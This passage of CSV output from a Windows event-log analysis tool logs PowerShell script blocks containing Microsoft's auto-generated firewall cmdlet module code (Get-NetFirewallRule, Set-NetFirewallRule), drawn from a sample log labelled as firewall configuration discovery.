[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.Conta",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"insKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletizatio",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"n_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = 